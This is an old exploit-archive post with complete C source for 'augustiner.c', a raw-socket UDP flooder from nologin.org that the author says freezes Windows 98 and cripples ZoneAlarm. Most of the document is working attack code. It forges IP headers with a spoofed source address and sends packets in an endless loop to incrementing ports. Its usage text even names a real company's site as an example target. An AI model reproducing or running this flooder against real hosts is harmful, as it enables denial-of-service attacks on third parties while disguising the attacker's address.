[-- Genre : Denial of Service(DoS) [-- Name : augustiner.c [-- Desc : Freezing Windows 98(not SE). [-- : DoS'ing Zonealarm (note: those are seperate incidents. It affects both independantly, not just W98 with ZA) [-- Url : www.nologin.org Yo everyone! _6Mo_hAcK posted a perl script that he said DoS'es Zonealarm. Well my W2K SP3 + ZA Pro 3.0.081 wasn't affected by his code, but as I coded something very similar a while ago, I modifed few lines and ran it against my ZA. Indeed sending massive amounts of UDP packets to random destination ports severly lags my W2k+ZA, rendering it mostly useless. Also, the same code affects Win98 (SE apparently not affected?. Tried that in VMware:)) It completely freezes while packets are being sent at it. As soon as the flood stops the machine resumes normal operation, without any obvious remaining negative effects. Note this is NOT related to Zonealarm. This is an independant vuln in Win98. That machine didnt have any firewall installed. While I found that Win98 was affected by flooding it with udp packets, the Zonealarm vuln(which is why I originally wrote the code :) was found by someone else. See attached code for both vulnerabilities. [-- Greets : Mr. "o" for pointing me at ZA and the vuln! [-- ace24 for being elite, cool, and a great guy [-- thorz for explaining me as much as I could ask years ago [-- skape for explaining me as much as I can ask today [-- thief for interesting discussions and lots of fun [-- ninja405 for providing nologin.org. Thx man! [-- ig88 for being the international man of mystery [-- westcose for being a great guy [-- Mr. "I bet this was funny in ..." trew for his "humour" :] [-- phenoelit.de (especially FtR) for lots of fun [-- and a place to crash warlord www.nologin.org
/* [------------------------------------------------------------------------] [-- nologin - nologin - nologin -=] [=- nologin - nologin - nologin --] [------------------------------------------------------------------------] [-- Genre : Denial of Service(DoS) --] [-- Name : augustiner.c --] [-- Desc : Udp flooder. Freezing Windows 98(not SE). --] [-- : DoS'ing Zonealarm --] [-- Url : www.nologin.org --] [-- Use : gcc -o augustiner augustiner.c; ./augustiner --] [------------------------------------------------------------------------] [-- Author : |WARL0RD| --] [-- Date : 8/2003 --] [-- Mod : 9/2003 --] [------------------------------------------------------------------------] [-- Comment: Win98 may be out of date, but it's still in widespread --] [-- use. --] [-- This tool is for educational purposes only of course. --] [-- As of today this vuln seems unpatched. --] [-- Ok after slightly modifying this code it finally has --] [-- the intended original effect of DoS'ing Zonealarm. --] [-- So augustiner.c is 2 DoS in 1. Congrats to Special --] [-- Discount Day. --] [------------------------------------------------------------------------] */ #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <linux/ip.h> #include <linux/udp.h> #include <netinet/in.h> #include <arpa/inet.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <time.h> #include <netdb.h> #include <errno.h> #define PSEUHDR sizeof(struct pseudohdr) #define IP struct iphdr #define UDP struct udphdr extern int errno; /***********************************************************/ void banner() { printf("\n\taugustiner.c\n"); printf("\tVersion 1.1\n"); printf("(c) warlord OF nologin.org\n"); printf("Check www.nologin.org\n"); printf("-----------------------------------\n"); return; } /**********************************************************/ void usage(char *name) { printf("Usage: %s <target> <source>\n",name); printf("The source address will be spoofed to what you specify\n"); printf("Example: ./augustiner www.microsoft.com\n"); exit(0); } /************************************************************/ unsigned short ipChecksum(unsigned short *ptr, int nbytes) { register long sum; register u_short answer; u_short oddbyte; sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } if (nbytes == 1) { oddbyte = 0; *((u_char *) & oddbyte) = *(u_char *) ptr; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } /*****************************************************************/ int sendUDP(int sock, char *dhost,char *shost) { unsigned int packetLen, minimalLength; unsigned char packet[(packetLen = sizeof(IP) + sizeof(UDP)+100)]; unsigned short ppp=0; IP *iphdr = (IP *)packet; UDP *udphdr = (UDP *)((unsigned char *)packet + sizeof(IP)); struct sockaddr_in s; struct hostent *he; srand(time(NULL)); unsigned char minimalip[(minimalLength = 12 + sizeof(UDP))]; memset(&s, 0, sizeof(s)); memset(packet, 0, packetLen); memset(minimalip, 0, minimalLength); if((he=gethostbyname(shost))==NULL) { *((unsigned long *)((unsigned char *)minimalip+0)) = inet_addr(shost); } else { *((unsigned long*)((unsigned char *)minimalip+0)) = *((char *)he->h_addr); } if((he=gethostbyname(dhost))==NULL) { *((unsigned long *)((unsigned char *)minimalip+0)) = inet_addr(dhost); } else { *((unsigned long*)((unsigned char *)minimalip+0)) = *((char *)he->h_addr); } *((unsigned char *)((unsigned char *)minimalip+8)) = 0; *((unsigned char *)((unsigned char *)minimalip+9)) = IPPROTO_UDP; *((unsigned short *)((unsigned char *)minimalip+10)) = htons(packetLen - sizeof(IP)); iphdr->version = 4; iphdr->ihl = 5; iphdr->id = 60000; iphdr->frag_off = 0; // iphdr->frag_off = 2050; if ((iphdr->saddr = inet_addr(shost)) == (unsigned long)-1) { if (!(he = gethostbyname(shost))) { printf("Couldn't resolve the src host\n"); exit(0); } memcpy(&iphdr->saddr, he->h_addr, sizeof(iphdr->saddr)); } if ((iphdr->daddr = inet_addr(dhost)) == (unsigned long)-1) { if (!(he = gethostbyname(dhost))) { printf("Couldn't resolve the dst host\n"); exit(0); } memcpy(&iphdr->daddr, he->h_addr, sizeof(iphdr->daddr)); } iphdr->protocol = IPPROTO_UDP; iphdr->ttl = 255; iphdr->tot_len = packetLen; iphdr->check = ipChecksum((u_short *)iphdr, sizeof(IP)); s.sin_family = AF_INET; if((he=gethostbyname(dhost))==NULL) { s.sin_addr.s_addr=inet_addr(dhost); } else { s.sin_addr=*((struct in_addr *)he->h_addr); } while(1) { ppp++; udphdr->source = htons(20000); udphdr->dest = htons(ppp); udphdr->len = htons(8); udphdr->check = 0; sendto(sock, packet, packetLen, 0, (struct sockaddr *)&s, sizeof(s)); } return 0; } /***********************************************************/ int main(int argc, char **argv) { int sock, optval=1; banner(); if(argc<3) usage(argv[0]); sock = socket(AF_INET,SOCK_RAW,IPPROTO_UDP); setsockopt(sock,IPPROTO_IP,IP_HDRINCL,&optval,sizeof(optval)); printf("Flooding %s with udp packets.\n",argv[1]); printf("Press Ctrl+C to stop\n"); sendUDP(sock, argv[1], argv[2]); close(sock); exit(0); }